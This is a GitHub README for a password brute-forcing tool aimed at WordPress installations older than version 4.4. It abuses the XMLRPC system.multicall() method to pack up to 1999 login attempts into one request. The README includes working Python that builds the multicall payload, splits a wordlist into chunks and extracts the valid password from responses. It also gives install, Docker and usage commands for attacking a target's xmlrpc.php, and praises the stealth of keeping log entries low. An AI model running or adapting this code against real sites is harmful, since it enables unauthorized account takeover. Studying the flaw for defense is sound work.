aress31 / xmlrpc-bruteforcer

Multi-threaded XMLRPC brute forcer using amplification attacks targeting WordPress installations prior to version 4.4.
Apache License 2.0

xmlrpc-bruteforcer


Bruteforcing CMS users' passwords via the XMLRPC interface.

This script is a PoC for the brute force amplification attack against XMLRPC interfaces that expose the _system.multicall()_ method (enabled by default in WordPress).

The _system.multicall()_ method allows multiple calls to be sent within a single HTTP request. Using this wrapper, an attacker can pack a large number of login attempts into very few requests, which keeps the network footprint (and the number of request log entries) small and makes the bruteforce both stealthier and more efficient than one attempt per request.

At the moment, the largest number of calls that can be wrapped in a single _system.multicall()_ without triggering a network error is 1999, so every HTTP request sent performs 1999 distinct login attempts.
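To make the mechanism concrete, the following added example (not the project's code) builds one _system.multicall()_ request body carrying a chunk of password guesses, shows how many calls fit inside it, and maps a multicall response back onto the guesses to pick out the one that succeeded. It assumes the target exposes `wp.getUsersBlogs(username, password)`, a standard authenticated WordPress XMLRPC method; the response used here is constructed sample data, with rejected attempts represented as fault structs, and the `chunked()` helper mirrors what the `-c` option controls.

```python
"""Added example: build and decode a system.multicall() amplification payload.

Not the project's code. Assumes the target exposes wp.getUsersBlogs(username,
password); the response parsed below is constructed sample data.
"""
import xmlrpc.client
from typing import Iterable, Iterator, List, Optional

# Any authenticated XMLRPC method will do; each call is one login attempt.
METHOD = "wp.getUsersBlogs"


def chunked(items: Iterable[str], size: int) -> Iterator[List[str]]:
    """Split a wordlist into chunks of at most `size` passwords (the -c option)."""
    chunk: List[str] = []
    for item in items:
        chunk.append(item)
        if len(chunk) == size:
            yield chunk
            chunk = []
    if chunk:
        yield chunk


def build_multicall(username: str, passwords: List[str]) -> bytes:
    """Return one HTTP body carrying len(passwords) login attempts.

    system.multicall takes a single array of {methodName, params} structs.
    """
    calls = [{"methodName": METHOD, "params": [username, pw]} for pw in passwords]
    body = xmlrpc.client.dumps((calls,), methodname="system.multicall")
    return body.encode()


def count_calls(body: bytes) -> int:
    """Decode a multicall request body and return how many sub-calls it carries."""
    (calls,), method = xmlrpc.client.loads(body.decode())
    if method != "system.multicall":
        raise ValueError("not a system.multicall request")
    return len(calls)


def find_valid_password(response_xml: str, passwords: List[str]) -> Optional[str]:
    """Map a multicall response back onto the passwords that were tried.

    Each result slot is either a one-element list (the method's return value,
    i.e. the credentials worked) or a fault struct (rejected).
    """
    (results,), _ = xmlrpc.client.loads(response_xml)
    for pw, result in zip(passwords, results):
        if isinstance(result, list):
            return pw
    return None


# Constructed sample data: four guesses, only the third one accepted.
SAMPLE_PASSWORDS = ["123456", "password", "letmein", "qwerty"]
_REJECTED = {"faultCode": 403, "faultString": "Incorrect username or password."}
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    (
        [
            _REJECTED,
            _REJECTED,
            [[{"blogid": "1", "blogName": "demo", "isAdmin": True}]],
            _REJECTED,
        ],
    ),
    methodresponse=True,
)


if __name__ == "__main__":
    body = build_multicall("admin", SAMPLE_PASSWORDS)
    print(f"{count_calls(body)} login attempts in a {len(body)}-byte request body")
    print("valid password:", find_valid_password(SAMPLE_RESPONSE, SAMPLE_PASSWORDS))
    # Full wordlist: one request per chunk of 1999 guesses.
    print(sum(1 for _ in chunked(["x"] * 4000, 1999)), "requests for 4000 guesses")
```

Against a patched WordPress (4.4 and newer) every slot after the first failed attempt in a request comes back as a fault regardless of the credentials, so `find_valid_password()` would return `None` even when the right password is in the chunk; that is the behaviour the version caveat below refers to.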

More information about the bruteforce amplification attack can be found at:

[!IMPORTANT] This script has been successfully tested against WordPress versions < 4.4. WordPress 4.4 closed the amplification: once one authentication attempt in a request fails, every later call in the same _system.multicall()_ is rejected without its credentials being checked, so against 4.4 and newer a multicall yields at most one real guess per request.

Installation

  1. Download this repository:

    git clone https://github.com/AresS31/xmlrpc-bruteforcer
    cd xmlrpc-bruteforcer
  2. Install the dependencies:

    pip install -r requirements.txt

Running on Docker

cd xmlrpc-bruteforcer
docker build -t xmlrpc-bruteforcer .
docker run --rm -v $(pwd):/wordlists xmlrpc-bruteforcer -u admin -w /wordlists/wordlist.txt -t 3 -x https://wordpress.local/xmlrpc.php

Usage

python3 xmlrpc-bruteforce.py -u [username] -w [wordlist] -x [xmlrpc_intf] -t [threads_number] -c [chunks_size] -v [verbose] -h [help]
[-u]: username of the targeted user, required
[-w]: wordlist containing the passwords to try, required
[-x]: xmlrpc interface to attack, required
[-t]: number of threads to run, optional, default value: 5
[-c]: number of calls to encapsulate within a system.multicall() call, optional, default value: 1999
[-v]: print debugging information, optional, default value: False
[-h]: print help

Roadmap

Sponsor 💖

If you want to support this project and appreciate the time invested in developing, maintaining and extending it, consider donating toward my next cup of coffee. ☕

It is easy: all you have to do is press the Sponsor button at the top of this page or, alternatively, click this link. 💸

Reporting Issues

Found a bug? I would love to squash it! 🐛

Please report all issues on the GitHub issues tracker.

Contributing

Would you like to contribute to improving this project? 🤩

Please submit all PRs on the GitHub pull requests tracker.

License

See LICENSE.